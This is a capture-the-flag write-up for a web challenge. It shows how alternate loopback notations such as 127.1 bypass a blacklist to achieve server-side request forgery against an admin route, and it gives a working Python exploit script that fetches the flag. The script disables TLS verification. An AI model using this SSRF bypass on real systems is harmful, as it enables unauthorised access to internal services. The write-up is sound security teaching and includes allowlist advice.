post-webapp
SRC: https://library.m0unt41n.ch/challenges/post-webappBy abusing alternate loopback notations like 127.1 or 0x7f000001, we glide past the naive filter without raising alarms. The server then fetches our crafted URL from 127.0.0.1, so the admin route trusts the request and happily serves the flag. It’s a textbook reminder that blacklists age poorly, use allowlists or strict CIDR checks, or expect your secrets to be public.
Heres the exploit script i came up with:
Python:
#!/usr/bin/env python3
import re, sys, requests, urllib3
urllib3.disable_warnings()
WEBAPP = "https://x.library.m0unt41n.ch:1337"
TRACK_SS = "http://127.1:5000/admin" #127.1 == 127.0.0.1 -> Bypass :contentReference[oaicite:0]{index=0}
def get_flag():
r = requests.post(
f"{WEBAPP}/track",
data={"url": TRACK_SS},
timeout=10,
verify=False
)
r.raise_for_status()
m = re.search(r"Flag:\s*([A-Za-z0-9_\-!{}]+)", r.text)
if not m:
raise RuntimeError("uffi")
return m.group(1)
def main():
flag = get_flag()
print(f"[+] flag found uwu: {flag}")
if __name__ == "__main__":
try:
main()
except Exception as e:
sys.exit(f"[-] error: {e}")